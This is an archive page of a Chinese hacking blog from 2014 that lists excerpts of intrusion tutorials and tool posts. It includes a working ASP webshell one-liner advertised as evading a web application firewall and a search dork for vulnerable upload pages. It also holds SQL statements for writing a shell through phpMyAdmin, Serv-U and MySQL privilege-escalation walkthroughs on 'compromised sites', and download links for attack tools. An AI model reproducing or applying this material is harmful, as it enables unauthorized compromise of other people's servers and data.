WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 2014年08月 发布的文章

分享一个上传漏洞关键字(自己使用burp截断)

如图: 关键字:  inurl:/admin/uploadface.asp 
作者:T.H.E   分类:最新教程   浏览(3526)   评论(4)   关键词: 渗透教程阅读全文

8月

21日

过狗一句话2014版热门

过狗一句话2014版

共享自己珍藏的过狗一句话 (还是那句话 越少人知道 存活率就越高) asp: <% dim play ' ' '''''''''''''''''' ''''''''' play = request("T.H.E") %> what's your name <% execute(play) %> php: <?php ...
作者:T.H.E   分类:最新工具   浏览(5592)   评论(4)   关键词: 一句话脚本阅读全文

如何关闭和开启 Wscript.Shell组件

Wscript.Shell和shell.application的主要作用是可以通过WEB程序调用exe程序,这个权限非常大,一般的网站是用不到这个服务的,但是如果被黑客利用,却能获得更大的权限,对服务器很危险。 关闭: 1、运行(打开)Wscript.Shell regsvr32 %windir%\system32\wshom.ocx 2、卸载(关闭)Wscript.Shell ...
作者:T.H.E   分类:最新教程   浏览(9344)   评论(0)   关键词: 提权教程阅读全文

最新修复接口版本 御剑2014

如图: 下载地址:链接: http://pan.baidu.com/s/1kTp65Sz 密码: tvss
作者:T.H.E   分类:最新工具   浏览(7232)   评论(2)   关键词: 旁站工具阅读全文

发一个 椰树1.8 h2修改版本

如图: 下载地址:链接: http://pan.baidu.com/s/1gdHzcnp 密码: 3ah2
作者:T.H.E   分类:最新工具   浏览(4234)   评论(0)   关键词: 旁站工具阅读全文

phpmyadmin各种技巧拿webshell 加 提权

今天一位基友 发一个phpmyadmin 的网站给我 之后我就打开一看 吓尿了 居然不要root密码. 看见了吗 现在可以导出shell了 先科普一下 mysql命令 导出一句话: 第一种 CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql...
作者:T.H.E   分类:入侵笔记   浏览(10191)   评论(12)   关键词: 提权教程阅读全文

本博客 恢复访问 之后会带来渗透教程

谢谢大家支持
作者:T.H.E   分类:生活资讯   浏览(2290)   评论(3)   关键词: 纯属扯淡阅读全文

在这发一个最新版本emlog博客后台 拿shell

今天碰到拿到了一个emlog博客后台权限 于是乎拿shell 网络上的说什么插件包里面 放入一个脚本木马 然后安装得到一个shell 还有模板安装 其实那些都是老的版本 今天不会碰到的是新版本 我测试了还是误解 于是看到了这个 看到了后台可以设置上传文件后缀 于是就添加一个asp (它只是过滤了php 其他脚本根本没过滤) 保存一下设置 ...
作者:T.H.E   分类:最新教程   浏览(4471)   评论(6)   关键词: 渗透教程阅读全文

Serv-U提权 (默认端口 默认账号密码)

提权一般先扫一下端口  如图: 看到了 43958(也就是 Serv-U 默认端口) 接下来就是看看能否执行或连接 如图 看到这里 说明是默认账号密码 可以执行 现在就来添加账号 (成功连接是不会弹出错误说明的) TID=33 说明成功了 查看管理员是否有 90the$ 这个用户 ...
作者:T.H.E   分类:入侵笔记   浏览(9933)   评论(2)   关键词: 提权教程阅读全文

8月

04日

安卓系统菜刀热门

安卓系统菜刀

今天带来一个 安卓版菜刀 如图: 百度网盘:http://pan.baidu.com/s/1pJAwEYB 转载请留下 作者id
作者:T.H.E   分类:最新工具   浏览(3723)   评论(2)   关键词: 渗透工具阅读全文

分享一个土耳其黑客渗透系列教材

如下: http://www.mavi1.org/videolar/joomla.htm http://www.mavi1.org/videolar/root.htm http://www.mavi1.org/videolar/2-6-15.htm http://www.mavi1.org/videolar/2-6-7.htm http://www.mavi1.org/videol...
作者:T.H.E   分类:网络文摘   浏览(2991)   评论(4)   阅读全文

win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)

今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站   先教拿shell 是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shell D:\wamp\www\js\content.php...
作者:T.H.E   分类:入侵笔记   浏览(24168)   评论(10)   关键词: 渗透教程阅读全文

一次只支持php脚本提权

shell是别人发我的 看了一下只支持php脚本 于是 就上传一个php大马 执行 dos命令 发现php可以直接执行系统命令 可以成功执行,只是没看到administrator,有点奇怪,看了一下这几个用户的权限,发现windsasc是管理员,如图: 然后看了下权限,震惊了一下,看图: ...
作者:T.H.E   分类:提权教程   浏览(6882)   评论(2)   阅读全文

mssql提权命令 + 修复xp_cmdshell

自己下载保存 1433sql提权命令 .doc
作者:T.H.E   分类:最新教程   浏览(3069)   评论(0)   阅读全文

分享一下 基础教程

如图 下载地址 : http://www.400gb.com/u/634919/2685175 都是一些基础教程   
作者:T.H.E   分类:最新教程   浏览(2743)   评论(0)   阅读全文
  • 全球访问统计

      Free counters!
  • <-----------------------------------------------分界线----------------------------------------------->